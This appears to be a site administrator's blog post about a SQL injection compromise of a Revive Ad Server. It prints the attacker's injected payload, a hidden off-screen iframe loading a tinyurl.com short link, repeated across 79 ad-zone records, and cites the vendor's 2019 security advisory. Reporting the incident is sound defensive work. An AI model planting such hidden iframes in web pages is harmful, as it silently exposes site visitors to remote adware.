No rest for the weary, a Revive Ad Server I am responsible for experienced a MySQL injection attack due to a vulnerability uncovered in the past few months. I was busy developing Vue.js code for the forums and thought to myself "I will get around to upgrading to Revive 4.2.0 (supposedly the not-vulnerable version) when I get further down-the road developing my Vue.js project". After all (sarcasm assured), why upgrade to mitigate a security vulnerability in a "working PHP 5.6 version of Revive" when upgrading to Revive 4.2.0 also requires an upgrade to PHP 7.0?!"
Then, of course it happens. No good deed goes unpunished, as they say; and while I was busy 12 hours a day coding in Vue.js, some "person with no life to speak of" injects very nasty adware into the DB. Here are the SQL table entries from the hacked server in the vulnerable append and prepend tables in Revive, which I never use anyway, injected with this very nasty adware.
This adware pulled down a lot of code and really damaged the ad server and also the search engine rankings because of the adware in the browser. Strangely, Google Webmaster Tools did not detect this. which is quite a shock, but there you go. Google Search really punished the site for the injected adware but on the other hand, GWTs did not detect it. Hmmm.
Here is what the "low lifes" injected:
mysql> SELECT zoneid, append, prepend FROM ox_zones WHERE append != '' OR prepend != '';
+--------+--------+----------------------------------------------------------------------------------------+
| zoneid | append | prepend |
+--------+--------+----------------------------------------------------------------------------------------+
| 1 | | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
| 2 | | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
| 3 | | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
| 4 | | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
| 5 | | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
| 6 | | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
| 7 | | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
| 8 | | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
| 9 | | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
| 10 | | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
| 11 | | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
| 12 | | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
| 13 | | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
| 14 | | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
| 15 | | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
| 16 | | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
| 17 | | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
| 18 | | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
| 19 | | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
| 20 | | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
| 21 | | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
| 22 | | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
| 23 | | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
| 24 | | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
| 25 | | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
| 26 | | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
| 27 | | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
| 48 | | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
| 47 | | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
| 46 | | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
| 44 | | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
| 43 | | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
| 42 | | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
| 39 | | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
| 40 | | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
| 41 | | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
| 49 | | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
| 50 | | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
| 51 | | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
| 52 | | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
| 53 | | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
| 54 | | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
| 55 | | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
| 56 | | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
| 57 | | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
| 58 | | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
| 59 | | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
| 60 | | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
| 61 | | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
| 62 | | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
| 63 | | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
| 64 | | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
| 65 | | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
| 66 | | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
| 67 | | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
| 68 | | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
| 69 | | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
| 70 | | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
| 71 | | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
| 72 | | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
| 73 | | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
| 74 | | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
| 75 | | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
| 76 | | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
| 77 | | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
| 78 | | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
| 79 | | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
| 80 | | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
| 81 | | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
| 82 | | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
| 83 | | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
| 84 | | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
| 85 | | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
| 86 | | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
| 87 | | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
| 88 | | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
| 89 | | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
| 90 | | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
| 91 | | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
+--------+--------+----------------------------------------------------------------------------------------+
79 rows in set (0.00 sec)
I think I need to move off the Revive Ad Server, because this is the second time in around six years that the Revive software has been found to have an SQL injection vulnerability that also caused me a lot of time wasted and damage to our "search engine reputation and integrity".
The last time it happened was a few days before New Years many years ago when I was on vacation in Bali scuba diving with this very cool Japanese women I used to know and the entire holiday was ruined because of it.
People who do not operate on the web have little idea of how much work it is to keep the engine running smoothly, 24x7, so others can enjoy the web !! :()
[Revive Adserver Security Advisory REVIVE-SA-2019-001, Date: 2019-04-23](Reference: Revive Adserver Security Advisory SA-2019-001)
- Advisory ID: REVIVE-SA-2019-001
- CVE-IDs: TBA
- Date: 2019-04-23
- Risk Level: High
- Applications affected: Revive Adserver
- Versions affected: < 4.2.0
- Versions not affected: >= 4.2.0
Date of advisory . 2019-04-23.. Date noticed first signs SQL injection 2019-04-30 (and ad server disabled). Update complete, 2019-05-02
... gotta be fast in today's fast paced cyber world.